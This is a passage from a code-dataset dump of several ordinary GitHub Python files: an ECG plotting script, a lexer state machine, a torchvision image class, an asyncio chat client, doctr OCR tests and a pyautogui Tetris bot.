"evocraftsearch.spaces.DiscreteSpace", "line_number": 97, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiDiscreteSpace", "line_number": 98, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.MultiBinarySpace", "line_number": 99, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DictSpace", "line_number": 100, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.DiscreteSpace", "line_number": 100, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 101, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.utils.flatten", "line_number": 105, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 105, "usage_type": "name"}, {"api_name": "evocraftsearch.spaces.utils.unflatten", "line_number": 106, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.utils", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.allclose", "line_number": 114, "usage_type": "call"}, {"api_name": "addict.Dict", "line_number": 116, "usage_type": "argument"}]} +{"seq_id": "12110970396", "text": "import matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nimport 
setupaxis\nfrom PreProcess import PreProcess\n\n\ndef my_plot(layout, data):\n print(layout)\n plt.subplot(4, 1, layout)\n plt.plot(data.get_values(), color='black', linewidth=0.5)\n setupaxis.setup_axis()\n\n\nif __name__ == '__main__':\n path = 'C:\\\\Users\\\\user\\\\Downloads\\\\'\n filename = 'processed_ecg.xlsx'\n # filename = '29.xlsx'\n\n # path = r'C:\\Users\\user\\Desktop\\整机\\典型927\\朱媛媛\\\\'\n # filename = r'16:57.xlsx'\n\n fullpath_name = path + filename\n\n my_data = PreProcess(fullpath_name).process(False)\n\n plt.figure(figsize=(20, 4))\n plt.subplots_adjust(bottom=0, top=1, left=0, right=1, hspace=0)\n\n plt.plot(my_data.get_values(), color='black', linewidth=0.5)\n setupaxis.setup_axis(False)\n\n plt.show()\n plt.savefig(filename.replace('xlsx', 'png'))\n", "repo_name": "ashifa/plot", "sub_path": "partly_plot.py", "file_name": "partly_plot.py", "file_ext": "py", "file_size_in_byte": 895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.subplot", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "setupaxis.setup_axis", "line_number": 12, "usage_type": "call"}, {"api_name": "PreProcess.PreProcess", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots_adjust", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "setupaxis.setup_axis", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "17020987049", "text": "from enum import Enum\n\n\nclass State(Enum):\n def __repr__(self):\n return self.name\n\n undefined = 0\n begin = 1\n char = 2\n openBrace = 3\n space = 7\n num = 8\n sign = 9\n newline = 10\n tab = 11\n str_start = 12\n str_end = 13\n operator_end = 14\n parameter = 15\n parameter_end = 16\n keyword = 100\n firstWord = 101\n secondWord = 102\n equalSign = 104\n accoladeOpenSign = 105\n accoladeCloseSign = 106\n comment = 107\n body = 108\n block_word = 109\n block_sign = 110\n block_param = 111\n block_end = 112\n label_start = 113\n label_param = 114\n label_end = 115\n\n\nclass StateMachine:\n def __init__(self, name, rules):\n \"\"\"\n State machine constructor.\n\n :param name: state machine token class\n :param rules: dict containing rules for machine\n \"\"\"\n self.rules = rules\n self.name = name\n self.prevState = State.begin\n self.state = State.begin\n\n def __repr__(self):\n return f\"{self.name.name}: {self.state.name}\"\n\n def process_object(self, obj):\n self.prevState = self.state\n if self.state != State.undefined:\n self.state = self.rules[self.prevState](obj)\n\n def 
reset_state(self):\n \"\"\"\n Set begin state for machine.\n \"\"\"\n self.prevState = State.begin\n self.state = State.begin\n", "repo_name": "dzmpr/peace-core", "sub_path": "src/lexer/state_machine.py", "file_name": "state_machine.py", "file_ext": "py", "file_size_in_byte": 1393, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "34455137891", "text": "from typing import Dict, Any, Union, Tuple\n\nimport torch\nfrom torchvision.prototype.utils._internal import StrEnum\n\nfrom ._feature import Feature, DEFAULT\n\n\nclass ColorSpace(StrEnum):\n # this is just for test purposes\n _SENTINEL = -1\n OTHER = 0\n GRAYSCALE = 1\n RGB = 3\n\n\nclass Image(Feature):\n color_spaces = ColorSpace\n color_space: ColorSpace\n\n @classmethod\n def _to_tensor(cls, data, *, dtype, device):\n tensor = torch.as_tensor(data, dtype=dtype, device=device)\n if tensor.ndim == 2:\n tensor = tensor.unsqueeze(0)\n elif tensor.ndim != 3:\n raise ValueError(\"Only single images with 2 or 3 dimensions are allowed.\")\n return tensor\n\n @classmethod\n def _parse_meta_data(\n cls,\n color_space: Union[str, ColorSpace] = DEFAULT, # type: ignore[assignment]\n ) -> Dict[str, Tuple[Any, Any]]:\n if isinstance(color_space, str):\n color_space = ColorSpace[color_space]\n return dict(color_space=(color_space, cls.guess_color_space))\n\n @staticmethod\n def guess_color_space(data: torch.Tensor) -> ColorSpace:\n if data.ndim < 2:\n return ColorSpace.OTHER\n elif data.ndim == 2:\n return ColorSpace.GRAYSCALE\n\n num_channels = data.shape[-3]\n if num_channels == 1:\n return ColorSpace.GRAYSCALE\n elif num_channels == 3:\n return ColorSpace.RGB\n else:\n return ColorSpace.OTHER\n", "repo_name": "isLinXu/DL_Frame_Models", "sub_path": "Pytorch_vision/torchvision/prototype/features/_image.py", "file_name": "_image.py", "file_ext": "py", "file_size_in_byte": 1484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.prototype.utils._internal.StrEnum", "line_number": 9, "usage_type": "name"}, {"api_name": "_feature.Feature", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.as_tensor", "line_number": 23, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 33, "usage_type": "name"}, {"api_name": "_feature.DEFAULT", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "72171251366", "text": "import argparse\nimport asyncio\nimport json\nimport os\n\nimport logging\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nlogger = logging.getLogger(__file__)\n\n\nasync def register(nickname):\n try:\n reader, writer = await asyncio.open_connection(os.environ['CHAT_HOST'], int(os.environ['CHAT_PORT']))\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write('\\n'.encode())\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(f'{nickname}\\n'.encode())\n await writer.drain()\n\n data = await reader.readline()\n os.environ['CHAT_TOKEN'] = json.loads(data.decode(\"utf-8\"))[\"account_hash\"]\n\n 
logger.debug(data.decode(\"utf-8\"))\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n finally:\n writer.close()\n await writer.wait_closed()\n\n\nasync def authorise():\n try:\n reader, writer = await asyncio.open_connection(os.environ['CHAT_HOST'], int(os.environ['CHAT_PORT']))\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(str(os.environ['CHAT_TOKEN'] + '\\n').encode())\n await writer.drain()\n\n data = await reader.readline()\n\n if not json.loads(data.decode(\"utf-8\")):\n print('введен неверный токен')\n return\n\n logger.debug(data.decode(\"utf-8\"))\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n finally:\n writer.close()\n await writer.wait_closed()\n\n\nasync def submit_message(message):\n try:\n reader, writer = await asyncio.open_connection(os.environ['CHAT_HOST'], int(os.environ['CHAT_PORT']))\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(str(os.getenv('CHAT_TOKEN') + '\\n').encode())\n\n data = await reader.readline()\n if not json.loads(data.decode(\"utf-8\")):\n print('введен неверный токен')\n return\n\n logger.debug(data.decode(\"utf-8\"))\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n\n writer.write(f'{message}\\n\\n'.encode())\n await writer.drain()\n\n data = await reader.readline()\n logger.debug(data.decode(\"utf-8\"))\n finally:\n writer.close()\n await writer.wait_closed()\n\n\nasync def main():\n\n if os.environ['CHAT_USER_NAME']:\n await register(os.environ['CHAT_USER_NAME'])\n\n await authorise()\n\n await submit_message(os.getenv('CHAT_MESSAGE'))\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n parser = argparse.ArgumentParser(description='Async writer')\n parser.add_argument('--host', type=str, default='minechat.dvmn.org', help='Connection host', dest='host')\n parser.add_argument('--port', type=int, default=5050, help='IP-port', dest='port')\n parser.add_argument('--token', type=str, default=os.getenv('CHAT_TOKEN'), help='chat token',\n dest='token')\n parser.add_argument('--username', type=str, default='', help='username', dest='username')\n parser.add_argument('--message', type=str, default='Hello world!', help='your message', dest='message')\n\n args = parser.parse_args()\n\n os.environ['CHAT_HOST'] = args.host\n os.environ['CHAT_PORT'] = str(args.port)\n os.environ['CHAT_TOKEN'] = args.token\n os.environ['CHAT_USER_NAME'] = args.username\n os.environ['CHAT_MESSAGE'] = args.message\n\n asyncio.run(main())\n\n", "repo_name": "dkuba/python_async_lesson4", "sub_path": "chat_writer.py", "file_name": "chat_writer.py", "file_ext": "py", "file_size_in_byte": 3575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 17, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": 
"json.loads", "line_number": 53, "usage_type": "call"}, {"api_name": "asyncio.open_connection", "line_number": 67, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 72, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 75, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 103, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 103, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 108, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 119, "usage_type": "attribute"}, {"api_name": "asyncio.run", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "12963251083", "text": "from typing import List, Tuple\nfrom unittest.mock import MagicMock, patch\n\nfrom pytest import mark\n\nfrom deepdoctection.extern.base import DetectionResult\nfrom deepdoctection.extern.doctrocr import DoctrTextlineDetector, DoctrTextRecognizer\nfrom deepdoctection.extern.model import ModelCatalog, ModelDownloadManager\nfrom deepdoctection.utils.detection_types import ImageType\nfrom tests.data import Annotations\n\n\ndef get_mock_word_results(np_img: ImageType, predictor, device) -> List[DetectionResult]: # type: ignore # pylint: disable=W0613\n \"\"\"\n Returns WordResults attr: word_results_list\n \"\"\"\n return Annotations().get_word_detect_results()\n\n\ndef get_mock_text_line_results( # type: ignore\n inputs: List[Tuple[str, ImageType]], predictor, device # pylint: disable=W0613\n) -> List[DetectionResult]:\n \"\"\"\n Returns two DetectionResult\n \"\"\"\n\n return [\n DetectionResult(score=0.1, text=\"Foo\", uuid=\"cf234ec9-52cf-4710-94ce-288f0e055091\"),\n DetectionResult(score=0.4, text=\"Bak\", uuid=\"cf234ec9-52cf-4710-94ce-288f0e055092\"),\n ]\n\n\nclass TestDoctrTextlineDetector:\n \"\"\"\n Test DoctrTextlineDetector\n \"\"\"\n\n @staticmethod\n @mark.pt_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text_lines\", MagicMock(side_effect=get_mock_word_results))\n def test_pt_doctr_detector_predicts_image(np_image: ImageType) -> None:\n \"\"\"\n Detector calls doctr_predict_text_lines. Only runs in pt environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/db_resnet50/pt/db_resnet50-ac60cadc.pt\"\n )\n categories = ModelCatalog.get_profile(\"doctr/db_resnet50/pt/db_resnet50-ac60cadc.pt\").categories\n doctr = DoctrTextlineDetector(\"db_resnet50\", path_weights, categories, \"cpu\") # type: ignore\n\n # Act\n results = doctr.predict(np_image)\n\n # Assert\n assert len(results) == 2\n\n @staticmethod\n @mark.tf_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text_lines\", MagicMock(side_effect=get_mock_word_results))\n def test_tf_doctr_detector_predicts_image(np_image: ImageType) -> None:\n \"\"\"\n Detector calls doctr_predict_text_lines. 
Only runs in tf environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/db_resnet50/tf/db_resnet50-adcafc63.zip\"\n )\n categories = ModelCatalog.get_profile(\"doctr/db_resnet50/tf/db_resnet50-adcafc63.zip\").categories\n doctr = DoctrTextlineDetector(\"db_resnet50\", path_weights, categories, \"cpu\") # type: ignore\n\n # Act\n results = doctr.predict(np_image)\n\n # Assert\n assert len(results) == 2\n\n\nclass TestDoctrTextRecognizer:\n \"\"\"\n Test DoctrTextRecognizer\n \"\"\"\n\n @staticmethod\n @mark.pt_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text\", MagicMock(side_effect=get_mock_text_line_results))\n def test_doctr_pt_recognizer_predicts_text(text_lines: List[Tuple[str, ImageType]]) -> None:\n \"\"\"\n Detector calls doctr_predict_text. Only runs in pt environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/crnn_vgg16_bn/pt/crnn_vgg16_bn-9762b0b0.pt\"\n )\n doctr = DoctrTextRecognizer(\"crnn_vgg16_bn\", path_weights, \"cpu\")\n\n # Act\n results = doctr.predict(text_lines)\n\n # Assert\n assert len(results) == 2\n\n @staticmethod\n @mark.tf_deps\n @patch(\"deepdoctection.extern.doctrocr.doctr_predict_text\", MagicMock(side_effect=get_mock_text_line_results))\n def test_doctr_tf_recognizer_predicts_text(text_lines: List[Tuple[str, ImageType]]) -> None:\n \"\"\"\n Detector calls doctr_predict_text. Only runs in tf environment\n \"\"\"\n\n # Arrange\n path_weights = ModelDownloadManager.maybe_download_weights_and_configs(\n \"doctr/crnn_vgg16_bn/tf/crnn_vgg16_bn-76b7f2c6.zip\"\n )\n doctr = DoctrTextRecognizer(\"crnn_vgg16_bn\", path_weights, \"cpu\")\n\n # Act\n results = doctr.predict(text_lines)\n\n # Assert\n assert len(results) == 2\n", "repo_name": "deepdoctection/deepdoctection", "sub_path": "tests/extern/test_doctrocr.py", "file_name": "test_doctrocr.py", "file_ext": "py", "file_size_in_byte": 4263, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1814, "dataset": "github-code", "pt": "52", "api": [{"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 13, "usage_type": "name"}, {"api_name": "tests.data.Annotations", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 21, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 21, "usage_type": "name"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 28, "usage_type": "call"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "deepdoctection.extern.base.DetectionResult", "line_number": 22, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 41, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 47, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 47, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelCatalog.get_profile", "line_number": 50, "usage_type": "call"}, 
{"api_name": "deepdoctection.extern.model.ModelCatalog", "line_number": 50, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextlineDetector", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark.pt_deps", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 39, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 40, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 40, "usage_type": "call"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 62, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 68, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 68, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelCatalog.get_profile", "line_number": 71, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelCatalog", "line_number": 71, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextlineDetector", "line_number": 72, "usage_type": "call"}, {"api_name": "pytest.mark.tf_deps", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 60, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 61, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 61, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 89, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 89, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 89, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 95, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 95, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextRecognizer", "line_number": 98, "usage_type": "call"}, {"api_name": "pytest.mark.pt_deps", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 87, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 88, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 88, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 109, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.ImageType", "line_number": 109, "usage_type": "name"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager.maybe_download_weights_and_configs", "line_number": 115, "usage_type": "call"}, {"api_name": "deepdoctection.extern.model.ModelDownloadManager", "line_number": 115, "usage_type": "name"}, {"api_name": "deepdoctection.extern.doctrocr.DoctrTextRecognizer", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark.tf_deps", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 107, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 108, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "38966429378", "text": "import pyautogui\r\nimport sys\r\nimport time\r\n\r\nclass Board:\r\n blockWidth = 26\r\n numColumns = 10\r\n numRows = 20\r\n grid = [False] * ((numRows+1) * 
numColumns) # +1 row, prevent out of bounds\r\n origin = (0, 0)\r\n nextPieceNumber = 0\r\n activePieceNumber = 0\r\n\r\n def findOrigin(self):\r\n orientPic = 'orient.PNG'\r\n orientXOffset = 18\r\n orientYOffset = 45\r\n\r\n origin = pyautogui.locateOnScreen(orientPic, grayscale=True)\r\n if origin == None:\r\n print('Open https://tetris.com/play-tetris')\r\n print('Press PLAY')\r\n print('Run main.py')\r\n sys.exit()\r\n\r\n (x, y, width, height)= origin\r\n return (x + orientXOffset, y + orientYOffset)\r\n\r\n def findActivePieceNumber(self):\r\n pieceNumbersByColor = {\r\n (143, 195, 205): 0,\r\n (205, 197, 143): 1,\r\n (189, 143, 205): 2,\r\n (205, 143, 143): 3,\r\n (143, 205, 156): 4,\r\n (205, 177, 143): 5,\r\n (143, 170, 205): 6,\r\n }\r\n\r\n for y in range(self.numRows):\r\n for x in range(self.numColumns):\r\n xPixel = self.origin[0] + (x * self.blockWidth)\r\n yPixel = self.origin[1] + (y * self.blockWidth)\r\n color = pyautogui.pixel(xPixel, yPixel)\r\n if (color != (0, 0, 0)):\r\n return pieceNumbersByColor[color]\r\n print('Error in findActivePieceNumber')\r\n\r\n def findNextPieceNumber(self):\r\n xOffset = 375\r\n yOffset = 90\r\n pieceNumbersByColor = {\r\n (0, 114, 127) : 0,\r\n (149, 142, 67): 1,\r\n (134, 67, 149): 2,\r\n (149, 67, 67) : 3,\r\n (67, 149, 92) : 4,\r\n (149, 123, 67): 5,\r\n (67, 112, 149): 6,\r\n }\r\n\r\n color = pyautogui.pixel(self.origin[0] + xOffset, self.origin[1] + yOffset)\r\n if color not in pieceNumbersByColor:\r\n print('Exiting...') # Game Over\r\n sys.exit()\r\n return pieceNumbersByColor[color]\r\n\r\n def unpause(self):\r\n xOffset = 127\r\n yOffset = 190\r\n\r\n (xOrigin, yOrigin) = self.origin\r\n pyautogui.click(xOrigin+xOffset, yOrigin+yOffset)\r\n time.sleep(3)\r\n\r\n def __init__(self):\r\n pyautogui.PAUSE = 0\r\n self.origin = self.findOrigin()\r\n self.unpause()\r\n self.nextPieceNumber = self.findNextPieceNumber()\r\n self.activePieceNumber = self.findActivePieceNumber()\r\n pyautogui.PAUSE = .035\r\n\r\n def move(self, move):\r\n def clearCompletedLines():\r\n for y in range(self.numRows):\r\n if isLineFilled(y):\r\n for index in range((y * self.numColumns) - 1, -1, -1):\r\n self.grid[index + self.numColumns] = self.grid[index]\r\n\r\n def isLineFilled(y):\r\n for x in range(10):\r\n if not self.grid[y * self.numColumns + x]:\r\n return False\r\n return True\r\n\r\n (orientation, xMove) = move\r\n\r\n # send keystrokes\r\n for i in range(orientation):\r\n pyautogui.press('up')\r\n if (xMove > 0):\r\n for i in range(xMove):\r\n pyautogui.press('right')\r\n else:\r\n for i in range(-xMove):\r\n pyautogui.press('left')\r\n pyautogui.press('space')\r\n\r\n # update grid with new blocks\r\n newCoords = self.predictCoordsAfterMove(orientation, xMove)\r\n for coord in newCoords:\r\n (x, y) = coord\r\n self.grid[y * self.numColumns + x] = True\r\n clearCompletedLines()\r\n\r\n # wait for the next piece\r\n for i in range(16):\r\n if not self.findNextPieceNumber() == self.nextPieceNumber:\r\n break\r\n time.sleep(.01)\r\n\r\n self.activePieceNumber = self.nextPieceNumber\r\n self.nextPieceNumber = self.findNextPieceNumber()\r\n\r\n def predictCoordsAfterMove(self, orientation, xMove):\r\n # coordArray[pieceType][orientation][blockNumber]\r\n numOrientations = 4\r\n numPiecetypes = 7\r\n coordArray = [[None for i in range(numOrientations)] for j in range(numPiecetypes)]\r\n coordArray[0][0] = [(3, 1), (4, 1), (5, 1), (6, 1)]\r\n coordArray[0][1] = [(5, 0), (5, 1), (5, 2), (5, 3)]\r\n coordArray[0][2] = [(3, 0), (4, 0), (5, 0), (6,
0)]\r\n coordArray[0][3] = [(4, 0), (4, 1), (4, 2), (4, 3)]\r\n coordArray[1][0] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[1][1] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[1][2] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[1][3] = [(4, 0), (5, 0), (4, 1), (5, 1)]\r\n coordArray[2][0] = [(4, 0), (3, 1), (4, 1), (5, 1)]\r\n coordArray[2][1] = [(4, 0), (4, 1), (5, 1), (4, 2)]\r\n coordArray[2][2] = [(3, 1), (4, 1), (5, 1), (4, 2)]\r\n coordArray[2][3] = [(4, 0), (3, 1), (4, 1), (4, 2)]\r\n coordArray[3][0] = [(3, 0), (4, 0), (4, 1), (5, 1)]\r\n coordArray[3][1] = [(5, 0), (4, 1), (5, 1), (4, 2)]\r\n coordArray[3][2] = [(3, 1), (4, 1), (4, 2), (5, 2)]\r\n coordArray[3][3] = [(5, 1), (4, 2), (5, 2), (4, 3)]\r\n coordArray[4][0] = [(4, 0), (5, 0), (3, 1), (4, 1)]\r\n coordArray[4][1] = [(4, 0), (4, 1), (5, 1), (5, 2)]\r\n coordArray[4][2] = [(4, 1), (5, 1), (3, 2), (4, 2)]\r\n coordArray[4][3] = [(3, 0), (3, 1), (4, 1), (4, 2)]\r\n coordArray[5][0] = [(5, 0), (3, 1), (4, 1), (5, 1)]\r\n coordArray[5][1] = [(4, 0), (4, 1), (4, 2), (5, 2)]\r\n coordArray[5][2] = [(3, 1), (4, 1), (5, 1), (3, 2)]\r\n coordArray[5][3] = [(3, 0), (4, 0), (4, 1), (4, 2)]\r\n coordArray[6][0] = [(3, 0), (3, 1), (4, 1), (5, 1)]\r\n coordArray[6][1] = [(4, 0), (5, 0), (4, 1), (4, 2)]\r\n coordArray[6][2] = [(3, 0), (4, 0), (5, 0), (5, 1)]\r\n coordArray[6][3] = [(4, 0), (4, 1), (4, 2), (3, 2)]\r\n\r\n # move oriented piece horizontally\r\n coords = coordArray[self.activePieceNumber][orientation]\r\n for i in range(4):\r\n (x, y) = coords[i]\r\n if x + xMove > 9 or x + xMove < 0:\r\n return None\r\n coords[i] = (x + xMove, y)\r\n\r\n # find shortest distance from piece block down to existing block or floor\r\n minDistance = self.numRows\r\n for coord in coords:\r\n (x, y) = coord\r\n blockPresent = False\r\n blockYPos = 0\r\n for blockYPos in range(self.numRows):\r\n if self.grid[(blockYPos + 1) * self.numColumns + x]:\r\n break\r\n minDistance = min([minDistance, blockYPos - y])\r\n\r\n # add shortest distance to y coords\r\n for i in range(4):\r\n (x, y) = coords[i]\r\n coords[i] = (x, y + minDistance)\r\n return coords\r\n", "repo_name": "DerekThree/Tetris", "sub_path": "Tetris/board.py", "file_name": "board.py", "file_ext": "py", "file_size_in_byte": 6857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyautogui.locateOnScreen", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "pyautogui.pixel", "line_number": 44, "usage_type": "call"}, {"api_name": "pyautogui.pixel", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 73, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "pyautogui.PAUSE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pyautogui.PAUSE", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pyautogui.press", "line_number": 101, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 104, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 107, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "36095088494", "text": "import cv2\nimport numpy as np\nimport os\nimport xml.etree.ElementTree as 
